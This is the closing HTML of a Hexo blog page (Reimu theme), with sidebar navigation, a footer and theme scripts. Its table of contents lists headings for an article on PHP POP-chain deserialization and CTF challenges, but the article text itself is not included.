    <div class="sidebar-state-number">16</div>
  </div>
  <div class="sidebar-state-category">
    <div>Categories</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tags</div>
    <div class="sidebar-state-number">9</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Home</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Archives</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">About</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Friend</div>
    </div>
  
</div>
</div>
      
      
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
      
    </div>
  </div>

  
</aside>

          
        </div>
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2020-2025
      <span class="footer-info-sep"></span>
      Flight-star
    </div>
    
      <div>
        Powered by&nbsp;<a href="https://hexo.io/" rel="noopener external nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener external nofollow noreferrer" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        10.4k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        00:45
      </div>
    
    
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">Number of visits&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">Number of visitors&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        <div class="sidebar-top">
          <img src="/images/taichi.png" height="50" width="50" alt="backtop" />
          <div class="arrow-up"></div>
        </div>
        <div id="mask"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">Contents</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%85%B3%E4%BA%8EPOP%E9%93%BE-Property-Oriented-Programming-Chain%EF%BC%89%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">关于POP链 (Property Oriented Programming Chain）：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B3%E4%BA%8E%E5%8E%9F%E7%94%9F%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">1.1.</span> <span class="toc-text">关于原生函数：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E5%8E%9F%E7%94%9F%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">1.1.1.</span> <span class="toc-text">常见的原生函数：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%8E%E4%B9%88%E5%88%A9%E7%94%A8%E5%8E%9F%E7%94%9F%E5%87%BD%E6%95%B0%EF%BC%9F%EF%BC%9A"><span class="toc-number">1.1.2.</span> <span class="toc-text">怎么利用原生函数？：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#array-walk%EF%BC%9A"><span class="toc-number">1.1.2.1.</span> <span class="toc-text">array_walk：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%8C%BF%E5%90%8D%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">1.1.2.1.1.</span> <span class="toc-text">匿名函数：</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text"></span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9C%A8%E4%BB%94%E7%BB%86%E7%90%86%E8%A7%A3%E5%90%8E%E4%BE%BF%E5%8E%BB%E5%85%88%E5%81%9A%E4%BA%86%E7%82%B9%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98%E7%9B%AE%EF%BC%9A-SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-pop"><span class="toc-number">2.0.1.</span> <span class="toc-text">在仔细理解后便去先做了点简单的题目：[SWPUCTF 2021 新生赛]pop</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#HZNUCTF-2023-preliminary-ppppop"><span class="toc-number">2.0.1.1.</span> <span class="toc-text">[HZNUCTF 2023 preliminary]ppppop</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%BD%91%E9%BC%8E%E6%9D%AF-2020-%E9%9D%92%E9%BE%99%E7%BB%84-AreUSerialz%EF%BC%88%E5%85%B6%E5%AE%9E%E8%BF%99%E4%B8%AA%E6%9C%AC%E6%9D%A5%E5%BA%94%E8%AF%A5%E6%94%BE%E5%9C%A8%E7%AC%AC%E4%B8%80%E4%B8%AA%E7%9A%84%EF%BC%8C%E5%BF%98%E8%AE%B0%E5%86%99%E4%BA%86%EF%BC%89"><span class="toc-number">2.0.1.2.</span> <span class="toc-text">[网鼎杯 2020 青龙组]AreUSerialz（其实这个本来应该放在第一个的，忘记写了）</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B0%E7%9F%A5%E8%AF%86%EF%BC%9A"><span class="toc-number">2.0.2.</span> <span class="toc-text">新知识：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E9%AD%94%E6%9C%AF%E6%96%B9%E7%A8%8B%EF%BC%9A"><span class="toc-number">2.1.</span> <span class="toc-text">常见的魔术方程：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-construct"><span class="toc-number">2.1.1.</span> <span class="toc-text">1. __construct()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-destruct"><span class="toc-number">2.1.2.</span> <span class="toc-text">2. __destruct()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-toString"><span class="toc-number">2.1.3.</span> <span class="toc-text">3. __toString()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-call"><span class="toc-number">2.1.4.</span> <span class="toc-text">4. __call()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-callStatic"><span class="toc-number">2.1.5.</span> <span class="toc-text">5. __callStatic()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-get"><span class="toc-number">2.1.6.</span> <span class="toc-text">6. __get()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-set"><span class="toc-number">2.1.7.</span> <span class="toc-text">7. __set()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#8-isset"><span class="toc-number">2.1.8.</span> <span class="toc-text">8. __isset()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#9-unset"><span class="toc-number">2.1.9.</span> <span class="toc-text">9. __unset()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#10-clone"><span class="toc-number">2.1.10.</span> <span class="toc-text">10. __clone()</span></a></li></ol></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Flight-star" class="lazyload">
  <div class="sidebar-author-name">Flight-star</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Posts</div>
    <div class="sidebar-state-number">16</div>
  </div>
  <div class="sidebar-state-category">
    <div>Categories</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tags</div>
    <div class="sidebar-state-number">9</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Home</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Archives</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">About</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Friend</div>
    </div>
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>


<script type="module" data-pjax>
  import PhotoSwipeLightbox from "https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js";
  
  const pswp = () => {
    if (_$$('.article-entry a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-entry',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    if(_$$('.article-gallery a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-gallery',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    window.lightboxStatus = 'done';
    window.removeEventListener('lightbox:ready', pswp);
  }
  if(window.lightboxStatus === 'ready') {
    pswp()
  } else {
    window.addEventListener('lightbox:ready', pswp);
  }
</script>
















  
<script src="https://npm.webcache.cn/mouse-firework@0.0.4/dist/index.umd.js"></script>

  <script>
    window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>







  
<script src="https://npm.webcache.cn/quicklink@2.3.0/dist/quicklink.umd.js"></script>

  <script data-pjax>
    window.quicklink?.listen({
      timeout: 3000,
      priority: true,
      ignores: []
    });
  </script>


<div id="lazy-script">
  <div>
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '0.3.3' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>

  <!-- hexo injector body_end start -->
<script src="/js/insert_highlight.js" data-pjax></script>
<!-- hexo injector body_end end --></body>
  </html>

